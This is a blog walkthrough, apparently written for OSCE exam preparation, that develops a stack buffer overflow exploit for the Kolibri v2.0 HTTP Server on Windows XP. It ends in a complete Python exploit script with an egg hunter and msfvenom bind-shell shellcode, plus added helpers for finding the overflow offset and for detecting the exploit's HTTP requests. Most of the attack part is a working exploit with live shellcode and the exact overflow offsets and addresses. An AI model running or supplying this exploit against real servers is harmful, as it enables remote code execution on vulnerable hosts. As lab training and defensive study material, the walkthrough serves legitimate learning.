Exploit Development : Kolibri v2.0 HTTP Server with EggHunter

Chenny Ren
5 min read · Nov 5, 2020


I decided to write and publish a series of exercise walkthroughs while I'm preparing for the OSCE exam. These exercises will focus heavily on exploit development.

Exercise reference: fuzzysecurity, http://fuzzysecurity.com/tutorials/expDev/4.html

Kali Linux : 10.0.2.15

Windows XP Pro Sp3 running Kolibri v2.0 HTTP Server : 10.0.2.7

The list of bad characters: "\x00\x0d\x0a\x3d\x20\x3f"

Run the Kolibri v2.0 HTTP Server on Windows XP (the debugging machine).

The HTTP server is running on port 8080

Attach Immunity Debugger to the running Kolibri process.

Let's create our initial Python script on the Kali machine to reproduce the crash.

Send 600 "A"s to the victim machine using the HEAD HTTP method.

The EIP register is overwritten with "\x41", the letter A in hexadecimal.

Following ESP in the dump, we can see our buffer.

Use pattern_create.rb and pattern_offset.rb to find out how many "A"s we need to reach EIP.

Replace the "A"s in the script with the pattern we created and run it again.

We see that EIP is overwritten with 32724131,

which means we need 515 "A"s to reach EIP.

Modify the script to verify this, and we clearly see EIP overwritten with exactly four "B"s.
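Added example (not code from the post, and not Metasploit's own pattern scripts): a small Python reimplementation of pattern_create/pattern_offset showing how the crash value 32724131 is read back little-endian as the four characters "1Ar2" and located at offset 515 in the cyclic pattern. It works for any crash value, so it is also handy for triaging a crash dump when the Metasploit tools are not installed.

```python
import string
import struct

PATTERN_MAX = 26 * 26 * 10 * 3   # the Aa0..Zz9 cycle is 20280 characters long


def pattern_create(length):
    """Build the Metasploit-style cyclic pattern (Aa0Aa1Aa2...Ab0...) of `length` chars."""
    if not 0 < length <= PATTERN_MAX:
        raise ValueError("length must be between 1 and %d" % PATTERN_MAX)
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]


def crash_value_to_chars(value):
    """Turn an EIP value read from the debugger (e.g. 0x32724131) back into the
    four pattern characters that overwrote it. x86 is little-endian, so the
    lowest byte (0x31 = '1') is the first character that landed in EIP."""
    return struct.pack("<I", value).decode("latin-1")


def pattern_offset(value, length=PATTERN_MAX):
    """Offset of the 4-char crash value inside the pattern, or None if absent.
    `value` may be the integer shown in the EIP register or the 4-char string."""
    needle = crash_value_to_chars(value) if isinstance(value, int) else value
    pos = pattern_create(length).find(needle)
    return None if pos == -1 else pos


if __name__ == "__main__":
    # the post's crash: EIP = 32724131 -> "1Ar2" -> offset 515
    print(crash_value_to_chars(0x32724131), pattern_offset(0x32724131))
```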

Let's find an address that can redirect execution flow to ESP:

!mona jmp -r esp

"JMP ESP" found at 0x71A91C8B in wshtcpip.dll.

Update the address in the script (in reverse byte order, since x86 is little-endian).

After redirecting our flow with "JMP ESP", we only have a little space to work with: just 2 bytes (C = \x43) remain after the return address. There is, however, plenty of room higher up in the buffer, where some of our initial "A"s sit.

What we do is jump back a few bytes to gain more room. One simple assembly instruction for this is "\xEB\x??", where "\xEB" is the short jump opcode and "\x??" is the signed number of bytes to jump back. If we choose to go 50 bytes back, let's use calc.exe to help us with the math:

The hex value is \xCE (256 - 50 = 206).

\xEB\xCE

Now we have 50 bytes to use. Generate a 32-byte egg hunter with mona, using the egg value "b33f".

Add our shellcode as stage 2, generated with msfvenom:

msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed

Final step: getting a shell.

Set up a netcat listener on our local Kali machine, listening on port 4444, execute the Python script, and we see we get a connection to the victim machine.

Done!

Exploit Scripts

```python
#!/usr/bin/python
#
# Author : Chenny Ren
# Exploiting Kolibri HTTP Server (EggHunter)
#
# Python 2: str literals are raw bytes, which socket.send expects here.

import socket

# jmp esp found at 0x71a91c8b wshtcpip.dll
# Short jmp 50 bytes back opcode: \xEB\xCE
# 32 bytes Egghunter b33f
egghunter = (
    "\x66\x81\xca\xff"
    "\x0f\x42\x52\x6a"
    "\x02\x58\xcd\x2e"
    "\x3c\x05\x5a\x74"
    "\xef\xb8\x62\x33"  # b3
    "\x33\x66\x8b\xfa"  # 3f
    "\xaf\x75\xea\xaf"
    "\x75\xe7\xff\xe7")

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/alpha_mixed
shellcode = ""
shellcode += "\xd9\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x38\x68\x6b\x32"
shellcode += "\x73\x30\x37\x70\x65\x50\x51\x70\x6e\x69\x6a\x45\x70"
shellcode += "\x31\x4b\x70\x75\x34\x4e\x6b\x62\x70\x50\x30\x6c\x4b"
shellcode += "\x36\x32\x34\x4c\x4e\x6b\x31\x42\x35\x44\x4c\x4b\x52"
shellcode += "\x52\x65\x78\x46\x6f\x6d\x67\x31\x5a\x35\x76\x66\x51"
shellcode += "\x39\x6f\x6c\x6c\x67\x4c\x45\x31\x73\x4c\x44\x42\x66"
shellcode += "\x4c\x47\x50\x79\x51\x5a\x6f\x34\x4d\x33\x31\x58\x47"
shellcode += "\x68\x62\x38\x72\x70\x52\x52\x77\x4c\x4b\x53\x62\x36"
shellcode += "\x70\x6c\x4b\x53\x7a\x45\x6c\x6e\x6b\x62\x6c\x66\x71"
shellcode += "\x50\x78\x68\x63\x43\x78\x46\x61\x6e\x31\x52\x71\x4e"
shellcode += "\x6b\x56\x39\x65\x70\x45\x51\x59\x43\x6e\x6b\x43\x79"
shellcode += "\x75\x48\x7a\x43\x67\x4a\x51\x59\x4e\x6b\x37\x44\x6e"
shellcode += "\x6b\x76\x61\x49\x46\x66\x51\x39\x6f\x6e\x4c\x6f\x31"
shellcode += "\x5a\x6f\x36\x6d\x73\x31\x6a\x67\x67\x48\x79\x70\x51"
shellcode += "\x65\x59\x66\x36\x63\x63\x4d\x6a\x58\x47\x4b\x71\x6d"
shellcode += "\x34\x64\x51\x65\x59\x74\x76\x38\x4e\x6b\x42\x78\x31"
shellcode += "\x34\x35\x51\x49\x43\x51\x76\x6e\x6b\x34\x4c\x70\x4b"
shellcode += "\x6e\x6b\x43\x68\x55\x4c\x76\x61\x79\x43\x4e\x6b\x35"
shellcode += "\x54\x4c\x4b\x35\x51\x4a\x70\x6c\x49\x43\x74\x56\x44"
shellcode += "\x46\x44\x33\x6b\x63\x6b\x73\x51\x51\x49\x63\x6a\x42"
shellcode += "\x71\x79\x6f\x79\x70\x53\x6f\x43\x6f\x43\x6a\x4c\x4b"
shellcode += "\x32\x32\x4a\x4b\x4e\x6d\x71\x4d\x61\x78\x57\x43\x77"
shellcode += "\x42\x47\x70\x47\x70\x63\x58\x31\x67\x50\x73\x76\x52"
shellcode += "\x73\x6f\x31\x44\x42\x48\x70\x4c\x53\x47\x67\x56\x36"
shellcode += "\x67\x79\x6f\x6b\x65\x6c\x78\x4c\x50\x65\x51\x73\x30"
shellcode += "\x55\x50\x75\x79\x79\x54\x30\x54\x46\x30\x61\x78\x45"
shellcode += "\x79\x4d\x50\x42\x4b\x45\x50\x4b\x4f\x69\x45\x73\x5a"
shellcode += "\x64\x48\x73\x69\x32\x70\x38\x62\x39\x6d\x73\x70\x76"
shellcode += "\x30\x37\x30\x76\x30\x70\x68\x38\x6a\x64\x4f\x79\x4f"
shellcode += "\x79\x70\x79\x6f\x68\x55\x5a\x37\x45\x38\x63\x32\x47"
shellcode += "\x70\x74\x51\x43\x6c\x4f\x79\x79\x76\x53\x5a\x62\x30"
shellcode += "\x36\x36\x43\x67\x53\x58\x68\x42\x49\x4b\x77\x47\x43"
shellcode += "\x57\x4b\x4f\x39\x45\x71\x47\x30\x68\x48\x37\x4b\x59"
shellcode += "\x50\x38\x79\x6f\x4b\x4f\x59\x45\x53\x67\x52\x48\x31"
shellcode += "\x64\x38\x6c\x67\x4b\x38\x61\x4b\x4f\x4b\x65\x43\x67"
shellcode += "\x6f\x67\x71\x78\x63\x45\x32\x4e\x32\x6d\x63\x51\x79"
shellcode += "\x6f\x5a\x75\x55\x38\x32\x43\x42\x4d\x43\x54\x75\x50"
shellcode += "\x6b\x39\x69\x73\x73\x67\x56\x37\x46\x37\x66\x51\x58"
shellcode += "\x76\x63\x5a\x46\x72\x76\x39\x33\x66\x39\x72\x4b\x4d"
shellcode += "\x30\x66\x78\x47\x50\x44\x56\x44\x75\x6c\x65\x51\x36"
shellcode += "\x61\x4e\x6d\x62\x64\x61\x34\x74\x50\x39\x56\x65\x50"
shellcode += "\x31\x54\x73\x64\x66\x30\x52\x76\x62\x76\x30\x56\x51"
shellcode += "\x56\x76\x36\x52\x6e\x32\x76\x66\x36\x31\x43\x63\x66"
shellcode += "\x42\x48\x32\x59\x48\x4c\x35\x6f\x6e\x66\x79\x6f\x58"
shellcode += "\x55\x6c\x49\x69\x70\x30\x4e\x56\x36\x61\x56\x4b\x4f"
shellcode += "\x36\x50\x62\x48\x54\x48\x4f\x77\x45\x4d\x35\x30\x79"
shellcode += "\x6f\x78\x55\x6f\x4b\x6c\x30\x6d\x65\x4c\x62\x71\x46"
shellcode += "\x61\x78\x4f\x56\x4e\x75\x4d\x6d\x6f\x6d\x79\x6f\x6b"
shellcode += "\x65\x67\x4c\x47\x76\x73\x4c\x54\x4a\x4d\x50\x4b\x4b"
shellcode += "\x4b\x50\x53\x45\x64\x45\x6d\x6b\x32\x67\x56\x73\x42"
shellcode += "\x52\x72\x4f\x72\x4a\x55\x50\x46\x33\x59\x6f\x79\x45"
shellcode += "\x41\x41"

# Stage 1: 478 + 32 + 5 = 515 bytes reach EIP, then the JMP ESP address
# (little-endian) and the short jump back into the "A" padding before the
# egg hunter (0x41 = inc ecx, so the padding acts as a slide into it).
Stage1 = "A" * 478 + egghunter + "A" * 5 + "\x8B\x1C\xA9\x71" + "\xEB\xCE"
# Stage 2: the egg tag twice, followed by the shellcode the egg hunter lands on.
Stage2 = "b33fb33f" + shellcode

buffer = (
    "HEAD /" + Stage1 + " HTTP/1.1\r\n"
    "Host: 10.0.2.7:8080\r\n"
    "User-Agent: " + Stage2 + "\r\n"
    "Keep-Alive: 115\r\n"
    "Connection: keep-alive\r\n\r\n")

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("10.0.2.7", 8080))
expl.send(buffer)
expl.close()
```
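From the defender's side, the request the script builds has a recognisable shape: an oversized request line carrying non-printable bytes, and a User-Agent that opens with a 4-byte tag repeated twice ("b33fb33f") followed by a long payload. The inspector below, added here as an example and not part of the post, flags those traits in raw HTTP requests; the two sample requests and the 512-byte request-line threshold are constructed for this example.

```python
import re

# Constructed sample request in the shape the post's script sends: stage 1 in the
# request line, the egg tag twice plus payload in User-Agent. The bytes here are
# filler standing in for the post's egg hunter and shellcode.
SAMPLE = (
    b"HEAD /" + b"A" * 515 + b"\xeb\xce" + b" HTTP/1.1\r\n"
    b"Host: 10.0.2.7:8080\r\n"
    b"User-Agent: b33fb33f" + b"\xd9\xcd" + b"IIIIAAAA" * 20 + b"\r\n"
    b"Connection: keep-alive\r\n\r\n"
)
# Constructed ordinary request for comparison.
BENIGN = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: 10.0.2.7:8080\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/3.6\r\n"
    b"Connection: keep-alive\r\n\r\n"
)

MAX_REQUEST_LINE = 512  # policy threshold chosen for this example, not a Kolibri limit
# A 4-byte tag immediately repeated (the egg hunter's "b33fb33f" marker) with at
# least 32 more bytes behind it, which is where a stage-2 payload would sit.
DOUBLED_TAG = re.compile(rb"(.{4})\1(?=.{32,})", re.DOTALL)


def inspect_request(raw):
    """Return the indicator names found in one raw HTTP request (empty if none)."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.split(b"\r\n")
    request_line, headers = lines[0], lines[1:]
    findings = []
    if len(request_line) > MAX_REQUEST_LINE:
        findings.append("oversized-request-line")
    # HTTP/1.1 request lines and header fields are expected to be printable ASCII
    if any(b < 0x20 or b > 0x7e for line in lines for b in line):
        findings.append("non-printable-bytes")
    for header in headers:
        name, _, value = header.partition(b":")
        if DOUBLED_TAG.search(value):
            findings.append("doubled-tag-with-long-tail:" + name.strip().decode("ascii", "replace"))
            break
    return findings


if __name__ == "__main__":
    for label, req in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, inspect_request(req))
```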


Chenny Ren

OSCP | OSWP | OSEP | CRTP | CRTE | CRTO | Red Team Professional | SOC engineer